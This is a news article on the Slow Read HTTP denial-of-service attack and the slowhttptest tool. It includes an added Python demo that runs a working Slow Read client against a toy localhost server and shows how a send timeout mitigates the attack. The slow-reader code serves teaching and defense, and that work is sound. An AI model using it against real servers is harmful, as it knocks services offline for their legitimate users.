New Denial Of Service Attack Cripples Servers Slowly
'Slow Read' proof-of-concept and tool released Thursday.
A researcher Thursday published proof-of-concept code that puts a different spin on the slow HTTP denial-of-service (DoS) attack: instead of sending its request slowly, the client reads the server's response slowly, holding the connection and the server resources behind it open until the server can no longer serve anyone else.
Sergey Shekyan, senior software engineer with Qualys, also has added this new so-called Slow Read attack to his open-source slowhttptest tool.
Slow Read sends a perfectly legitimate HTTP request and then reads the response a few bytes at a time. The server's response stalls in its send buffer, the connection (and the thread or worker handling it) stays occupied far longer than a normal request would, and an attacker who opens enough such connections exhausts the server's connection pool and causes a DoS.
Shekyan's slowhttptest tool was initially inspired by two related open-source tools, Slowloris and OWASP's Slow HTTP POST. Slowloris keeps connections open by sending partial HTTP requests, adding a header at regular intervals so the server never times the socket out. The Slow HTTP POST distributed DoS (DDoS) tool sends complete POST headers with a legitimate "Content-Length" field that tells the Web server how much body data to expect, then transmits the message body very slowly, tying up the connection and the server resources assigned to it.
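The mechanism is easiest to see end to end. The script below is an added illustration, not code from the article or from Shekyan's slowhttptest: it starts a tiny threaded HTTP server on localhost with a fixed pool of four workers (a stand-in for a real server's worker pool), opens four Slow Read connections against it, and checks whether a normal client can still get a response. The attacker side is exactly what the article describes: a valid GET, a deliberately small TCP receive window (SO_RCVBUF), and one-byte reads every half second. The server caps its per-connection send buffer so the worker, not the kernel, ends up holding the response; the optional send_timeout argument stands in for a server-side send timeout (what nginx's send_timeout directive does) so you can see the mitigation free the workers.

```python
"""Slow Read HTTP DoS against a toy threaded server, all on 127.0.0.1 (constructed demo)."""
import socket
import threading
import time

MAX_WORKERS = 4          # the whole worker pool; tiny so the effect shows with four sockets
BODY = b"A" * (1 << 20)  # 1 MiB body: far more than the socket buffers can absorb


class TinyServer:
    """One worker thread per connection, at most MAX_WORKERS at a time (assumed server)."""

    def __init__(self, send_timeout=None):
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(64)
        self.port = self.sock.getsockname()[1]
        self.send_timeout = send_timeout   # None = wait forever, like an unprotected server
        self.slots = threading.Semaphore(MAX_WORKERS)
        self.busy = 0
        self.lock = threading.Lock()
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            self.slots.acquire()            # block until a worker is free
            try:
                conn, _ = self.sock.accept()
            except OSError:                 # listening socket closed: shut down
                self.slots.release()
                return
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        with self.lock:
            self.busy += 1
        try:
            # Cap the kernel send buffer so the worker holds the response, not the kernel.
            conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 16 * 1024)
            conn.settimeout(self.send_timeout)
            conn.recv(4096)                 # the request (a one-packet GET is enough here)
            headers = (b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n"
                       b"Connection: close\r\n\r\n" % len(BODY))
            conn.sendall(headers + BODY)    # blocks for as long as the client's window is shut
        except OSError:
            pass                            # reset, broken pipe, or the send timeout firing
        finally:
            conn.close()
            with self.lock:
                self.busy -= 1
            self.slots.release()

    def close(self):
        self.sock.close()


def slow_reader(port, stop):
    """Attacker side: valid request, tiny receive window, then drain one byte per 0.5 s."""
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)  # must be set before connect()
    try:
        s.connect(("127.0.0.1", port))
        s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
        while not stop.is_set():
            s.recv(1)                       # keep the connection alive, but barely
            stop.wait(0.5)
    except OSError:
        pass
    finally:
        s.close()


def legit_get(port, timeout=1.0):
    """A normal client. True if a 200 response arrives within `timeout` seconds."""
    s = socket.create_connection(("127.0.0.1", port), timeout=timeout)
    try:
        s.sendall(b"GET / HTTP/1.0\r\n\r\n")
        return s.recv(4096).startswith(b"HTTP/1.0 200")
    except OSError:                         # includes the read timeout
        return False
    finally:
        s.close()


def run_demo(send_timeout=None, hold_seconds=1.0):
    """Run the attack against a fresh server; report worker usage and service availability."""
    server = TinyServer(send_timeout)
    stop = threading.Event()
    readers = [threading.Thread(target=slow_reader, args=(server.port, stop), daemon=True)
               for _ in range(MAX_WORKERS)]
    for t in readers:
        t.start()
    time.sleep(hold_seconds)
    result = {"busy_during_attack": server.busy,
              "legit_served_during_attack": legit_get(server.port)}
    stop.set()                              # attacker hangs up: RSTs unblock the workers
    for t in readers:
        t.join()
    time.sleep(0.2)
    result["legit_served_after"] = legit_get(server.port)
    server.close()
    return result


if __name__ == "__main__":
    print("no send timeout:", run_demo())
    print("0.5 s send timeout:", run_demo(send_timeout=0.5))
```

With no send timeout, all four workers are busy while the attack runs and the normal client's request times out; the moment the attacker hangs up, the workers are freed and service resumes. With a 0.5 s send timeout the workers are already free by the time the normal client arrives, which is the point of the mitigation: the server, not the client, decides how long a response may take to drain. Note how little the attacker spends to get there: four sockets, one request each, and a byte every half second.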
Slow HTTP attacks are gaining in popularity among attackers as a way to quietly wage a DoS attack: they are easy to carry out, they need only minimal computing resources and bandwidth because each connection sends or reads almost nothing, and because every request looks legitimate on its own they are often hard to detect until the server has already run out of connections.